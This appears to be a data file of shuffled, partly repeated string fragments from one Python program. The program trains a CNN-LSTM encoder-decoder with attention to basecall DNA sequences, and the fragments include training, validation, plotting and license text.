"for LSTM seq_length x out_size # Calculate cross entropy loss # output =",
"0 num_chars = 0 for idx, length in enumerate(target_lengths): length = int(length.item()) seq",
"nn.Linear(input_size, 4 * hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) self.port",
"of source code must retain the above copyright notice, this list of conditions",
"1)))) if updates % make_validation == 0: print(\"=\" * 30) print(\"batch {} in",
"on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val],",
"output_dim=5, num_layers=2, own_cell_decoder = False, bidirectional = False, port=1, attention=True, dropout=0): super(LSTMdecoder, self).__init__()",
"LSTMencoder(input_dim=out_channels, hidden_dim = hidden, batch_size=batch, output_dim=hidden, num_layers=num_layers, own_cell_encoder=False, bidirectional = bidir, port=port, dropout=dropout)",
"forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias))) print(start, end) # ingate start, end = 0, n//4",
"np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) else: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses),",
"# epoch_editd += ed # running_editd_train += ed # editd_iteration.append(ed2) # print(\"edit distance=",
"type=int, default=1234, help=\"Set seed\") parser.add_argument('-b', '--batch_size', type=int, default=256, help=\"Batch size\") parser.add_argument('-e', '--epochs', type=int,",
"acc_iteration.append(acc) #if editD: # if updates % make_validation == 0: # ed =",
"plot_error_accuarcy_iterations_val(input, pdf=None, editD=True): sns.set(font_scale=1) loss_val, acc_val, editd_val = input[1], input[3], input[5] fig =",
"idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length:",
"input for LSTM seq_length x out_size # Calculate cross entropy loss # output",
"criterion=criterion, clipping_value=clipping_value, val_ds = val_set, batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path + \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping,",
"type=float, default=0, help=\"Weight decay\") parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Weight decay\") parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)), nargs='?',",
"= ''.join([vocab[int(x.item())] for x in seq_target[0:length]]) result = editdistance.eval(encoded_pred, encoded_target) editd += result",
")) with PdfPages(save_files_path + \"{}.pdf\".format(fname)) as pdf: plot_error_accuarcy(out12[1], pdf, editD=editD) bestPerformance2File(out12[1], save_files_path +",
"vs. updates from trainings set\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0,",
"p in model.parameters() if p.requires_grad) def init_weights_orthogonal_lstm(m): for name, param in m.named_parameters(): if",
"\"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0], pdf, editD=editD) print(\"Training took: {:0>2}:{:0>2}:{:05.2f}\".format(int(hours),int(minutes),seconds)) if __name__",
"be shown to the LSTM packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True) # Define the",
"= hidden[0][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2 = hidden[1][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) hidden_original =",
"loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings",
"LSTM layer if self.bidirectional: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False,",
"(batch, seq, feature), lstm_in_unroll, hidden = self.lstm_unroll(input, hidden) # [batch size, seq, hidden",
"= i < true_y_len # get indices of not padded sequences true_y_len =",
"length sorted_len_target, sorted_idx_target = lab_len.sort(0, descending=True) sorted_hiddens1 = encoder_hidden[0][:, sorted_idx_target, :] sorted_hiddens2 =",
"running_editd_train = 0.0 running_editd_val = 0.0 print(\"=\" * 100) print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs), \"Loss:",
"(hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMencoder(nn.Module): #Our batch shape for input x",
"len encoder_outputs = encoder_outputs[not_padded_batches, :, :] else: label = y[:, :, i] #",
"sorted_idx_target, :] sorted_hiddens = (sorted_hiddens1, sorted_hiddens2) sorted_encoder_output = ecoder_output[sorted_idx_target, :, :] # sort",
"input[3], input[4], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax",
"teacher forcing parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--tf_ratio', type=float, default=Range(0.0, 1.0), help=\"Teacher",
"float(iteration_val + 1)), \"Val Accuracy: {:.6f}%...\".format((epoch_acc_val / float(iteration_val + 1)) * 100)) print(\"=\"",
"sig_len, tensor_y, label_len, label10, batch_size, shuffle=True): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10)",
"Steps\") plt.ylabel(\"Activation\") if i == 1: plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{} {}\".format(label, title)) if pdf",
"[batch, input_dim] # shape of lstm_out: [seq_len, batch, output_dim] # shape of self.hidden:",
"= 1 # one hot encode input input_decoder = label if teacher_force else",
"for v in list(acc_train.values())], label=\"training accuracy\") if validation: ax.plot(list(acc_val.keys()), [v*100 for v in",
"= args.input_bias_cnn strides = args.strides kernel = args.kernel cnn_out = args.channel_number #256 pooling_type",
"input_dim] # shape of lstm_out: [seq_len, batch, output_dim] # shape of self.hidden: (a,",
"+= loss.item() acc = (reshaped_output[notpadded_index, :].argmax(1) == reshaped_sorted_labels[notpadded_index] ).sum().item() / reshaped_sorted_labels[notpadded_index].size(0) epoch_acc +=",
"False out_classes = 5 random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic = True # Load",
"decreasing target length sorted_len_target, sorted_idx_target = lab_len.sort(0, descending=True) sorted_hiddens1 = encoder_hidden[0][:, sorted_idx_target, :]",
"plt.title(\"Edit Distance vs. updates\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def",
"TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE",
"PdfPages import math import torch.optim as optim from torch.utils.data import Dataset, DataLoader from",
"gate bias in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str, default=\"0\", help=\"Set forget gate bias in Decoder-LSTM\")",
"(seq*batch, out dim), target = (seq*batch) # Target nicht one-hot encoden reshaped_output =",
"return sum(p.numel() for p in model.parameters() if p.requires_grad) def init_weights_orthogonal_lstm(m): for name, param",
"Forward pass through LSTM layer # shape of lstm_in: [batch, input_dim] # shape",
"= original_idx.cpu() unsorted_idx_hiddens = original_idx.view(1, -1, 1).expand_as(hidden[0]) unsorted_hiddens1 = hidden[0][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long())",
"lr)) f.write(\"TF={}, reduced TF ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget gate bias encoder={}, forget gate bias",
"= dropout_probability, dropout_input = dropout_input, input_bias_cnn=input_bias_cnn) out_channels = CNN.output_channel[n_layers_cnn-1] lstm = LSTMencoder(input_dim=out_channels, hidden_dim",
"= data[4] #Wrap them in a Variable object inputs, labels, labels10 = Variable(batch_x,",
"# Target nicht one-hot encoden reshaped_output_val = output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val = sorted_labels_val.view(-1) notpadded_index_val",
"WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS",
"matplotlib.ticker as ticker from matplotlib.backends.backend_pdf import PdfPages import math import torch.optim as optim",
"tensor_y, sig_len, label_len, label10, read_idx) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size,",
"+= ed_val val_editd.append(ed_val) total_ed += ed_val total_num_chars += num_char_ref if editD: cer =",
"args.cnn_layers batch_normalization = args.batch_norm dropout_on = args.dropout_cnn dropout_input = args.dropout_input dropout_probability = args.drop_prob",
"\"C\", 2: \"G\", 3: \"T\", 4: \"<EOF>\", 5: \"<PAD>\"} # A=0, C=1, G=2,",
"param.size(0) # forget gate start, end = n//4, n//2 # ordering ingate, forgetgate,",
"# teacher forcing parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--tf_ratio', type=float, default=Range(0.0, 1.0),",
"clipping_value=None, val_ds=None, test_ds=None, batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000, mode=\"train\", shuffle=True, patience = 25,",
"split_LSTMbiases and \"bias\" in p and \"lstm\" in p and \"linear\" not in",
"f.write(str(model12)) f.write(\"\\nThe model has {:,} trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch size={}, earlyStopping={}, patience={},",
"own_cell_decoder = False, bidirectional = False, port=1, attention=True, dropout=0): super(LSTMdecoder, self).__init__() self.input_dim =",
"y_class, random_value, mode_type, beam_width=1): # Forward pass through LSTM layer # shape of",
"float(total_ed) / total_num_chars if updates == 0: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates)",
"hidden state as return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self, x,",
"lstm_encoder.batch_size == lstm_decoder.batch_size, \"Encoder and decoder must have equal batch size!\" def forward(self,",
"next input #if not, use predicted token onehot = torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:, top1]",
"edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit distance vs. updates from validation",
"train_ds, optimizer, criterion, clipping_value=None, val_ds=None, test_ds=None, batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000, mode=\"train\", shuffle=True,",
"accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from trainings set\") if",
"float(make_validation)) > 0.35 and teacher_forcing_ratio >= 0.25: # if we have reached half",
"in name and \"linear\" not in name: for b in [\"input\", \"forget\", \"cell\",",
"f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings",
"# remove neagtive samples negative_idx = seq_len_cnn > 0 seq_len_cnn = seq_len_cnn[negative_idx] in_lstm",
"label_len, label10, read_idx) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False,",
"a and b both have shape (num_layers, batch_size, hidden_dim). if self.bidirectional: hidden1 =",
"mappings gates = self.i2h(x) + self.h2h(h) ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1)",
"ed # else: # ed = 0 # ed2 = old_ed # #",
"if editD: #writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train",
"0, labels_val, lab_len_val, labels10_val, labels_val.size(1), mode) output_val = torch.transpose(output_val, 0, 1).contiguous() # input",
"(256, 1, 11) m = matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else: m = matrix_param[p] input[idx_p, idx]",
"cnn import SimpleCNN, BasicBlock, SimpleCNN_res from cnn import outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg') class",
"on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train))",
"updates teacher_forcing_ratio = teacher_forcing_ratio * 0.95 else: teacher_forcing_ratio # Evaluation on the validation",
"> 2: # and matrix_param[p].shape[1] == 1: # (256, 1, 11) m =",
"train_ds[5] #Get training data train_loader = get_train_loader_trainVal(input_x, signal_len, input_y, label_len, input_y10, batch_size=batch_size, shuffle=True)",
"if len(matrix_param[p].shape) > 2: # and matrix_param[p].shape[1] == 1: # (256, 1, 11)",
"pdf: plot_error_accuarcy(out12[1], pdf, editD=editD) bestPerformance2File(out12[1], save_files_path + \"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0],",
"acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val)) f.close() def basecalling(argv): parser =",
"f.close() # with 10 reads, kernel size = 11 start = time.time() out12",
"= self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) # (batch_size*seq, out_dim) input_decoder = F.log_softmax(lstm_in_unroll, dim=1) # (batch_size*seq, out_dim)",
"sorted_len_target, sorted_idx_target = lab_len.sort(0, descending=True) sorted_hiddens1 = encoder_hidden[0][:, sorted_idx_target, :] sorted_hiddens2 = encoder_hidden[1][:,",
"clipping_value) print(\"teacher forcing ratio=\", teacher_forcing_ratio) print(\"shuffle=\", shuffle) if val_ds is not None: input_x_val",
"= matrix_param[p] input[idx_p, idx] = np.linalg.norm(m, ord=2) if split_LSTMbiases and \"bias\" in p",
"bidirectional=False, dropout=self.dropout) else: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout)",
"= batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_encoder = own_cell_encoder self.bidirectional =",
"len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend()",
"batch size, output dim] top1 = input_decoder.argmax(1) # get argmax of prediction #if",
"clipping\") # early stopping parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--patience', type=int, default=25,",
"true_batch_size:max_seq_len, features filled with 0 outputs[i, 0:input_decoder.size(0), :] = input_decoder # [max. target",
"sorted_len_target # In[ ]: def get_train_loader_trainVal(tensor_x, sig_len, tensor_y, label_len, label10, batch_size, shuffle=True): my_dataset",
"idx_p, p in enumerate(y_len): if len(matrix_param[p].shape) > 2: # and matrix_param[p].shape[1] == 1:",
"matrix_param[p].shape[1] == 1: # (256, 1, 11) m = matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else: m",
"train_set = read_data[0] val_set = read_data[1] train_set = [train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port),",
"chosen between 1 and a few hundreds, e.g. [batch size] = 32 is",
"= LSTMencoder(input_dim=out_channels, hidden_dim = hidden, batch_size=batch, output_dim=hidden, num_layers=num_layers, own_cell_encoder=False, bidirectional = bidir, port=port,",
"# ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) if forget_bias_decoder != \"None\"",
"{} dict_validation_acc2 = {} dict_training_editd2 = {} dict_validation_editd2 = {} dict_weights = {}",
"3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy",
"f.write(\"TF={}, reduced TF ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget gate bias encoder={}, forget gate bias decoder={}\"",
"bias=True): super(LSTMCellEncoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias = bias self.i2h",
"Define the output layer if self.bidirectional: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim",
"in p.keys(): if epoch % print_epoch == 0 or epoch == max(p.keys()): x",
"name in y_len: if \"bias\" in name and \"lstm\" in name and \"linear\"",
"loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val)) f.close() def basecalling(argv): parser = make_argparser() args = parser.parse_args(argv[1:]) infile",
"4: break encoded_pred.append(vocab[int(p.item())]) encoded_pred = ''.join(encoded_pred) encoded_target = ''.join([vocab[int(x.item())] for x in seq_target[0:length]])",
"else: # ed = 0 # ed2 = old_ed # # old_ed =",
"last one #print(true_y_len, true_y_len.size()) input_decoder = input_decoder[not_padded_batches, :] # get only batches that",
"% print_epoch == 0 or epoch == max(p.keys()): x = np.arange(0, len(p[epoch].detach().numpy())) #",
"shape (num_layers, batch_size, hidden_dim). # Sort instances by sequence length in descending order",
"in_lstm[negative_idx, : , :] # [batch, seq_len, input_dim] lab_len = lab_len[negative_idx] labels =",
"sys import torch import torch.nn as nn from torch.autograd import Variable import torch.nn.functional",
"help=\"Weight decay\") parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient clipping\") #",
"epoch_acc_val += acc_val running_acc_val += acc_val val_acc.append(acc_val) if editD: ed_val, num_char_ref = convert_to_string(output_val.argmax(2),",
"1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from",
"if \"weight\" in name and len(list(param.data.size())) > 1: nn.init.orthogonal_(param.data) def plot_error_accuarcy(input, pdf=None, steps=50,",
"INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR",
"bidirectional=False, dropout=self.dropout) # Define the output layer if self.bidirectional: if self.attention: # attention",
"= F.sigmoid(ingate) forgetgate = F.sigmoid(forgetgate) cellgate = F.tanh(cellgate) outgate = F.sigmoid(outgate) cy =",
"name: print(name,param.data.size()) n = param.size(0) # forget gate start, end = n//4, n//2",
"attn_weights = F.softmax( self.attn(torch.cat((encoder_outputs[:, i, :], hidden[0][0]), dim=1)), dim=1) # encoder batch first:",
"{} dict_validation_loss = {} dict_training_acc = {} dict_validation_acc = {} dict_training_editd = {}",
"call = args.call lr = args.learning_rate editD = args.editD sgd = False out_classes",
"np.concatenate(np.array(list(loss_train.values()))), label=\"training error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from trainings set\") ax",
"# * CNN-Encoder # * LSTM-Encoder # * LSTM-Decoder # The Encoder #",
"x.view(x.size(0), -1) # Linear mappings gates = self.i2h(x) + self.h2h(h) ingate, forgetgate, cellgate,",
"{} dict_activations_forget = {} dict_activations_cell = {} dict_activations_out = {} dict_activations_in_decoder = {}",
"output gate start, end = n//2 + n//4, n input_biases[idx_b+3, idx] = np.linalg.norm(m[start:",
"hidden[1][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) hidden_original = (unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original = unpacked[original_idx, :, :]",
"\"Encoder and decoder must have equal number of layers!\" assert lstm_encoder.batch_size == lstm_decoder.batch_size,",
"lstm_decoder.hidden_dim, \"Hidden dimensions of encoder and decoder must be equal!\" assert lstm_encoder.num_layers ==",
"plt.close(\"all\") def plot_error_accuarcy_iterations_val(input, pdf=None, editD=True): sns.set(font_scale=1) loss_val, acc_val, editd_val = input[1], input[3], input[5]",
"max_idx_train = max(acc_train, key=lambda k: acc_train[k]) max_idx_val = max(acc_val, key=lambda k: acc_val[k]) f",
"sorted_encoder_output, seq_len_cnn, max_label_len, labels10_sorted, teacher_forcing_ratio, sorted_hiddens, sorted_len_target, labels_sorted, random_value, mode_type, beam_width) # seq_length",
"editD: ed_val, num_char_ref = convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val) epoch_editd_val += ed_val running_editd_val += ed_val",
"= val_ds[4] read_val = val_ds[5] input_x = train_ds[0] input_y = train_ds[1] input_y10 =",
"0.95 else: teacher_forcing_ratio # Evaluation on the validation set val_losses = [] val_acc",
"[] model.eval() total_ed = 0 total_num_chars = 0 with torch.no_grad(): for iteration_val, data_val",
"CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES",
"(num_layers, batch_size, hidden_dim). # Sort instances by sequence length in descending order #print(\"in",
"by decreasing target length sorted_len_target, sorted_idx_target = lab_len.sort(0, descending=True) sorted_hiddens1 = encoder_hidden[0][:, sorted_idx_target,",
"CNN = SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out] , kernel_size=kernel, stride=strides, padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization, dropout",
"0: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates)",
"this list of conditions and the following disclaimer in the documentation and/or other",
"output layer if self.bidirectional: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 4,",
"patience_earlyStop = args.patience weight_decay = args.weight_decay #0.01 #0.01 clipping_value = args.gradient_clip # LSTM",
"= script_dir + '/training_result_{}/'.format(fname) writer = SummaryWriter(script_dir + '/training_result_{}'.format(fname)) train_set = read_data[0] val_set",
"be equal!\" assert lstm_encoder.num_layers == lstm_decoder.num_layers, \"Encoder and decoder must have equal number",
"start, end = n//2 + n//4, n input_biases[idx_b+3, idx] = np.linalg.norm(m[start: end], ord=2)",
"dict_training_loss2 = {} dict_validation_loss2 = {} dict_training_acc2 = {} dict_validation_acc2 = {} dict_training_editd2",
"nn.Linear(input_size, 4 * hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) #",
"split_LSTMbiases: y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]]) for x in y_len_biases] df_b = pd.DataFrame(input_biases,",
"len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from validation set\")",
"= 0 loss_iteration = [] acc_iteration = [] editd_iteration = [] for iteration,",
"= torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port) # [max. target length, batch size, hidden dim] max_in_batch",
":, :] # batch, out_size, seq_len ########################################### ##### Decoder ############################# ########################################### #### LSTM",
"pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases = False):",
"= self.lstm_decoder( sorted_encoder_output, seq_len_cnn, max_label_len, labels10_sorted, teacher_forcing_ratio, sorted_hiddens, sorted_len_target, labels_sorted, random_value, mode_type, beam_width)",
"epoch_editd_val = 0 epoch_editd = 0 print(\"=\" * 30) print(\"epoch {}/{}\".format(epoch+1, n_epochs)) print(\"=\"",
"seq length (i) >= true seq length if i >= true_y_len[-1].item() and len(true_y_len)",
"hidden): h, c = hidden h = h.view(x.size(0), -1) c = c.view(x.size(0), -1)",
"math import torch.optim as optim from torch.utils.data import Dataset, DataLoader from sklearn.preprocessing import",
"parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) return parser # Network # ----------- #",
"self.output_dim).cuda(self.port) onehot[:, top1] = 1 # one hot encode input input_decoder = label",
"def init_weights_orthogonal_lstm(m): for name, param in m.named_parameters(): if \"weight\" in name and len(list(param.data.size()))",
"= False, bidirectional = False, port=1, attention=True, dropout=0): super(LSTMdecoder, self).__init__() self.input_dim = input_dim",
"None) and (updates % make_validation == 0): # or (updates == n_epochs-1)): if",
"writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates) if editD: #writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates)",
"dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) else: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates)",
"self.output_dim = output_dim self.own_cell_decoder = own_cell_decoder self.bidirectional = bidirectional self.port=port self.attention = attention",
"#if editD: # if updates % make_validation == 0: # ed = np.mean(np.array(convert_to_string(output.argmax(2),",
"sig_len, label_len, label10, read_idx) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0,",
"distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val)) else: f.write(\"best performances",
"= nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) # targets oder batch sortieren # unsort the output _,",
"sorted_labels_len_val = model(inputs_val, seq_len_val, 0, labels_val, lab_len_val, labels10_val, labels_val.size(1), mode) output_val = torch.transpose(output_val,",
"binary form must reproduce the above copyright notice, this list of conditions and",
"# Evaluation on the validation set val_losses = [] val_acc = [] val_editd",
"DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF",
"parser.parse_args(argv[1:]) infile = args.input fname = args.output port = args.gpu_port SEED = args.set_seed",
"= args.kernel cnn_out = args.channel_number #256 pooling_type = args.pooling_type #\"average\" n_layers_cnn = args.cnn_layers",
"unsort the output _, original_idx = sorted_idx.sort(0, descending=False) # unsort hiddens original_idx =",
"lstm_in_unroll.size(2))) # (batch_size*seq, out_dim) input_decoder = F.log_softmax(lstm_in_unroll, dim=1) # (batch_size*seq, out_dim) --> (batch_size,",
"our hidden state as return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self,",
"for iteration_val, data_val in enumerate(val_loader): batch_x_val = data_val[0] batch_y_val = data_val[1] seq_len_val =",
":] # batch-i, features, seq len encoder_outputs = encoder_outputs[not_padded_batches, :, :] else: label",
"0, 1).contiguous() # input for LSTM seq_length x out_size # Calculate cross entropy",
"> 0.35 and teacher_forcing_ratio >= 0.25: # if we have reached half of",
"for x in y_len_biases] df_b = pd.DataFrame(input_biases, index=y_len_biases, columns=x_len) print(df_b.head()) sns.set(font_scale=0.4) svm =",
"encoder_hidden, ecoder_output = self.lstm_encoder(in_lstm, seq_len_cnn) ########################################### ##### Sorting ############################# ########################################### #### sort by",
"= args.learning_rate editD = args.editD sgd = False out_classes = 5 random.seed(SEED) np.random.seed(SEED)",
"labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long()) labels10_sorted = labels10[sorted_idx_target, :, :] # batch, out_size, seq_len ###########################################",
"encoder_hidden[0][:, sorted_idx_target, :] sorted_hiddens2 = encoder_hidden[1][:, sorted_idx_target, :] sorted_hiddens = (sorted_hiddens1, sorted_hiddens2) sorted_encoder_output",
"# with 10 reads, kernel size = 11 start = time.time() out12 =",
"model12.cuda(port) print(model12, next(model12.parameters()).is_cuda) if sgd: optimizer = optim.SGD(model12.parameters(), lr=lr, momentum=0) else: optimizer =",
"if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_val(input, pdf=None, editD=True): sns.set(font_scale=1)",
"total_num_chars += num_char_ref if editD: cer = float(total_ed) / total_num_chars if updates ==",
"in y_len] df = pd.DataFrame(input, index=y_len, columns=x_len) print(df.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df, linewidths=0.0,",
"sequences true_y_len = true_y_len[not_padded_batches] # remove smallest element = last one #print(true_y_len, true_y_len.size())",
"ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF",
"m.named_parameters(): if \"weight\" in name and len(list(param.data.size())) > 1: nn.init.orthogonal_(param.data) def plot_error_accuarcy(input, pdf=None,",
"batch_first=True, bidirectional=False, dropout=self.dropout) # Define the output layer if self.bidirectional: if self.attention: #",
"# ed = np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len))) # ed2 = ed # else: #",
